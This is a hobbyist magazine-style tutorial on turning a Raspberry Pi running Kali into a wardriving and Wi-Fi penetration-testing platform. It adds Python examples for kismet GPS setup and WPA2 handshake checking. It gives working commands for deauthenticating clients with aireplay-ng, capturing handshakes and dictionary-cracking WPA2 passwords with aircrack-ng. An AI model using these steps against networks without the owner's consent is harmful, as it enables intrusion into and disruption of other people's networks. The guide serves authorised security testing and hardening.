Raspberry Pi protection!
The best offence is a strong Raspberry Pi defence, cries Nate Drake, as he charges into the fray wielding a tiny single-board PC and his Linux knowledge.
Your Raspberry Pi can be used as much more than a hobbyist’s computer. As a separate machine, you can employ it to improve the security of your home or office network. Over the following pages, you’ll learn how to transform your Pi into a wireless attack platform using the penetration-testing OS Kali, capable of hacking networks.
The Pi can also function as a buffer between your computer and potential malware. For this reason, you’ll also discover how to use it as an ad-blocking DNS server with Pi-hole, and a sanitiser for removing harmful files from USB sticks before you insert them into your PC.
More experienced users may also enjoy our guide on setting up your Pi as a network honeypot. This allows your Pi to masquerade as a full-blown web server complete with dummy files. All activity by hackers is recorded and no changes they make will affect other devices on your network, giving you crucial insight into who wants to access your data.
We start with the subtle art of Wardriving: driving around in a vehicle, while using a computer to search for vulnerable wireless networks to exploit. Wireless hacking software is freely available over the internet. Small computers like the Raspberry Pi are also very easy to power and conceal. As such, Wardrivers no longer require a team of men in a white van to break into wireless networks. Indeed, in recent years there have also been examples of Warcycling and Wardroning.
This guide focuses on how you, as an ethical hacker, can perform penetration tests on routers and IoT devices to make sure they’re less vulnerable to this form of exploitation.
Before we begin, we’d like to offer the usual disclaimer that you should only perform penetration testing on networks with the permission of the owner, even (and especially) if you feel that their security is particularly lax.
As you’re acting legally, there is no particular need to emulate Wardrivers fully by strapping your Pi onto a drone or vehicle. However, we encourage you to partner up with a fellow pen-tester and focus your Wardriving attempts on each other’s networks instead of your own. This will make for a much more realistic test, as you can also see how easy it is for a stranger to gain physical access to the area where their network is based. It’s also a good deal more fun!
At the Wardriver wheel
To get started as a Wardriver, you’ll need a Raspberry Pi that supports wireless, such as the Raspberry Pi 3 or Raspberry Pi Zero W. You’ll also need a microSD card at least 16GB in size to install Kali.
All of the steps outlined below can be run from the command line, so technically you could boot your Pi and connect via SSH from a laptop or similar. However, it makes more sense as a Wardriver to connect your Pi to an external display such as the official Raspberry Pi seven-inch touchscreen display. This will save space, particularly if you install an onscreen keyboard such as matchbox-keyboard.
If you plan to use your Wardriving Pi in a vehicle, consider either connecting it to a portable battery pack or, better yet, to your car’s lighter socket. Whichever power source you use, make sure it matches the Pi’s requirements (5V, 2.5A).
You’ll also need a wireless adaptor that can be connected via USB and is compatible with the aircrack-ng suite, in that it can enter monitor mode and perform packet injection. When researching this article we used the Racksoy Professional Ralink 5370 (available from Amazon UK for around £6).
If you’re pen-testing your own networks or a friend’s then it’s not very likely you’ll need to map out exactly where they are as you’ll already know! However, Wardrivers sometimes make use of GPS devices when running kismet to be able to locate target networks in their area.
As an ethical hacker, you might also wish to do this in order to seek out rogue Wi-Fi APs in your organisation, which can make your network more vulnerable. There are a number of GPS devices that are compatible. For this article we used the GlobalSat BU-353-S4 USB, which are available for around £30 on Amazon UK.
If you do want to plot Wi-Fi networks, open Terminal on Kali and run apt-get install gpsd gpsd-clients. This installs the basic GPS software. Connect the GPS device to a USB port on the Pi and run dmesg | tail -n 5 to find out which device node it has been assigned: for example, /dev/ttyUSB0.
Start the GPS daemon on that device, such as gpsd /dev/ttyUSB0. Next, edit the kismet configuration file by running nano /etc/kismet/kismet.conf. Uncomment the lines gpstype=serial and gpsdevice=/dev/rfcomm0 by removing the # at the start. Replace rfcomm0 with the actual device node of the GPS, for example ttyUSB0, then press Ctrl+X, Y, then Return to save and exit.
Start the GPS device with gpsd /dev/ttyUSB0 (if it isn’t already running), then run kismet -l. You should now see the GPS data displayed in the kismet window.
This is automatically saved to a .netxml file in your home folder. You can use the program giskismet to transform this into a .kml file, which is compatible with map software like Google Earth. First install the program with apt-get install giskismet, then run it on the .netxml file: for example, giskismet -x capture1-01.kismet.netxml.
Next, use the command giskismet -q "select * from wireless" -o <filename>.kml to create the .kml file itself.
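As an added example that is not part of the original article, the dmesg lookup and kismet.conf edit described above as a small Python helper. The sample dmesg line and config fragment are constructed, and the device-path check is an assumption of mine, not something kismet does:

```python
import re

# Constructed sample of the relevant kismet.conf lines, as the article
# describes them: both GPS options commented out with a leading '#'.
SAMPLE_KISMET_CONF = """\
# GPS options
#gpstype=serial
#gpsdevice=/dev/rfcomm0
gpshost=localhost:2947
"""

# Constructed dmesg line of the kind the article says to look for.
SAMPLE_DMESG = "[  123.456] usb 1-1.2: pl2303 converter now attached to ttyUSB0"


def gps_device_from_dmesg(dmesg_text):
    """Pull the tty node the USB serial driver reported (e.g. /dev/ttyUSB0)."""
    m = re.search(r"attached to (tty[A-Za-z]+\d+)", dmesg_text)
    return "/dev/" + m.group(1) if m else None


def configure_kismet_gps(conf_text, device):
    """Return kismet.conf text with a serial GPS enabled on `device`.

    Uncomments gpstype=serial and gpsdevice=..., pointing gpsdevice at the
    node found via dmesg. Already-uncommented lines are rewritten rather than
    duplicated; if either line is missing it is appended so kismet still
    receives the setting.
    """
    # Assumption: only accept a plain /dev node so a typo can't inject
    # anything odd into the config file.
    if not re.fullmatch(r"/dev/[A-Za-z0-9_.-]+", device):
        raise ValueError("unexpected GPS device path: %r" % device)
    lines = conf_text.splitlines()
    seen = {"gpstype": False, "gpsdevice": False}
    for i, line in enumerate(lines):
        stripped = line.lstrip("#").strip()
        if stripped.startswith("gpstype="):
            lines[i] = "gpstype=serial"
            seen["gpstype"] = True
        elif stripped.startswith("gpsdevice="):
            lines[i] = "gpsdevice=" + device
            seen["gpsdevice"] = True
    if not seen["gpstype"]:
        lines.append("gpstype=serial")
    if not seen["gpsdevice"]:
        lines.append("gpsdevice=" + device)
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(configure_kismet_gps(SAMPLE_KISMET_CONF, gps_device_from_dmesg(SAMPLE_DMESG)))
```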
In the words of Girls Against Boys, you can’t fight what you can’t see. This can lead some network managers and home users to think that using a hidden Wi-Fi network will protect them from Wardriving, as a hacker would need to know both the name of the wireless network and the password.
Hidden networks are in fact extremely easy to detect. Using Terminal in Kali, simply run airodump-ng <interface> (airodump-ng wlan1mon, for example) to list nearby networks. Any hidden networks will be listed; only the ESSID (network name) is hidden.
Run airodump-ng once again to focus on this specific network using its MAC address, such as airodump-ng -c 1 --bssid CC:61:E5:CE:90:92 wlan1mon. This will list any clients attached to the hidden network.
Finally, follow the steps in the guide to open a new tab in Terminal and try to deauthenticate one or more of the devices, adding the -c option to target a specific client. For example: aireplay-ng -0 5 -a CC:61:E5:CE:90:92 -c 10:9A:DD:B3:48:0B wlan1mon. If you’re successful, when you return to the original airodump-ng Terminal window, you’ll see the name of the hidden Wi-Fi network has now appeared under ‘ESSID’.
When a client connects to a WPA-secured AP (Access Point), it engages in a four-way handshake. The AP initially sends an unencrypted nonce value to the client. The client then generates its own encryption key and nonce, and creates a transient key using its own nonce and the AP’s. It then sends an unencrypted message to the AP containing this key. The AP can then extract the client’s nonce and generate the encryption keys. It messages the client to verify it’s the same device and asks if the client is ready to exchange encryption keys. The client responds and the connection between it and the AP is secured.
This is an oversimplification of how wireless networking operates, but it’s important you understand this in general terms, as capturing the data packets used during handshakes is a crucial first step in breaking into a wireless network.
As you’ll see from the guide (right), it’s easy to record data packets from a wireless network and capture handshakes. You can, however, increase your network security by using strong Wi-Fi passwords and changing them regularly.
If you follow the steps in the guide to capture data using airodump-ng, you’ll find a data capture file with the extension .cap sitting in the /root/kali home folder (capture-01.cap, say).
If the captured data contains handshakes between clients and the target AP, you can perform a dictionary attack on the password using aircrack-ng. This utility works by using a list of common passwords as well as words from the dictionary. You can find a number of popular password lists online, including that used by the password cracking utility John the Ripper, which comes preinstalled in Kali.
To download the John the Ripper password list, open Terminal and run: wget http://downloads.skullsecurity.org/passwords/john.txt.bz2
Extract the file by running bzip2 -d john.txt.bz2, then begin trying to crack the Wi-Fi password with aircrack-ng -w john.txt <capture-file-name>, for example aircrack-ng -w john.txt capture-01.cap.
The Raspberry Pi 3 can check around 500 passwords a second, which sounds impressive until you realise password lists can contain millions of words. As aircrack-ng can be run offline, we suggest you transfer the capture file to a desktop machine or use cloud computing to crack the password.
The speed at which you crack the password will also be determined by the quality of the password list. See https://github.com/danielmiessler/SecLists/tree/master/Passwords for a more comprehensive list of passwords. Be warned that some of these are well over 100MB.
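To show what aircrack-ng is actually checking for each wordlist entry, and why the four-way handshake described earlier is all it needs, here is an added Python example (not from the article or the aircrack-ng project). It derives the PMK and PTK as IEEE 802.11i specifies and compares the recomputed message-2 MIC with the captured one. The SSID, MAC addresses, nonces, EAPOL frame and passphrase are all constructed, not taken from a real capture:

```python
import hashlib
import hmac

def wpa2_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    Nearly all the cracking cost is here: 8192 HMAC-SHA1 calls per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def wpa2_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PRF-512 (IEEE 802.11i): expand the PMK with both MAC addresses and both
    nonces, lower value first, into the 64-byte pairwise transient key (PTK)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 20 bytes, then truncate to 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]

def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP: the message MIC is HMAC-SHA1 under the KCK (PTK bytes 0-15),
    truncated to 16 bytes, over the EAPOL frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]

def passphrase_matches(guess, ssid, ap_mac, client_mac, anonce, snonce,
                       eapol_frame, captured_mic):
    """The per-guess check aircrack-ng performs against a captured handshake."""
    ptk = wpa2_ptk(wpa2_pmk(guess, ssid), ap_mac, client_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(ptk[:16], eapol_frame), captured_mic)

# Constructed handshake, NOT a real capture: locally administered fake MACs,
# fixed nonces, and a stand-in EAPOL message-2 body with its MIC field zeroed.
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("020000000001")
CLIENT_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
EAPOL_M2 = b"\x01\x03\x00\x75\x02\x01\x0a" + bytes(8) + SNONCE + bytes(64) + bytes(18)
TRUE_PASSPHRASE = "correct horse battery staple"  # constructed for the demo
CAPTURED_MIC = eapol_mic(
    wpa2_ptk(wpa2_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16],
    EAPOL_M2)

def first_matching_passphrase(wordlist):
    """Walk a wordlist the way aircrack-ng -w does; None if nothing matches."""
    for guess in wordlist:
        if passphrase_matches(guess, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE,
                              EAPOL_M2, CAPTURED_MIC):
            return guess
    return None
```

The fixed 4096-round PBKDF2 is why the Pi manages only a few hundred guesses a second, and it also means a long random passphrase that appears in no wordlist is out of reach no matter where the capture file is taken.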
If the target AP supports WPS, you may be able to break in using the Raspberry Pi alone without capturing or cracking any handshake data. See the Crack WPS with Reaver boxout (below) for help with this.
Wardriving works best when you’re near the target network (the clue is in the name) and there are few other sources of wireless interference. If you want to make sure your network is safe at a range, or find your current wireless card is impractical for pen-testing, consider using a larger antenna (see the previous ‘Yes you cantenna!’ boxout).
Even devices that are advertised as Linux compatible and/or you’ve used previously with Kali Linux on a desktop machine may not necessarily work with the version of the Linux kernel you’re using on the Pi. Make sure to research thoroughly before getting started.
If you boot all devices off a network but are still unable to capture handshakes, you may have more joy by targeting individual clients. See the previously mentioned section on hidden networks for details on how to do this.
Both dictionary and brute force attacks on Wi-Fi passwords will take much longer on the Pi than on a regular computer. We suggest you capture your files on the Pi, then transfer them elsewhere, for example to a desktop machine. If you’ve a few shekels to spare, consider cracking WPA2 passwords using cloud computing such as the Amazon Linux AMI, which can attempt dictionary and brute force attacks using GPUs, considerably speeding up the process.
If you’ve been suitably terrified by what you’ve read here, make sure to apply what you’ve learned and encourage your friends/clients to use WPA2-AES encryption where possible and disable WPS on all devices. If you discovered any lurking rogue APs, you may also want to ask them to draft up a policy for creating wireless networks in their workplace.
Keep an eye in your area for War Chalking. Inspired by the Hobo signs of yesteryear, these alert fellow Wardrivers to various kinds of networks.
Use software like Google Earth to display the .kml created by giskismet. This is an excellent way to find rogue access points.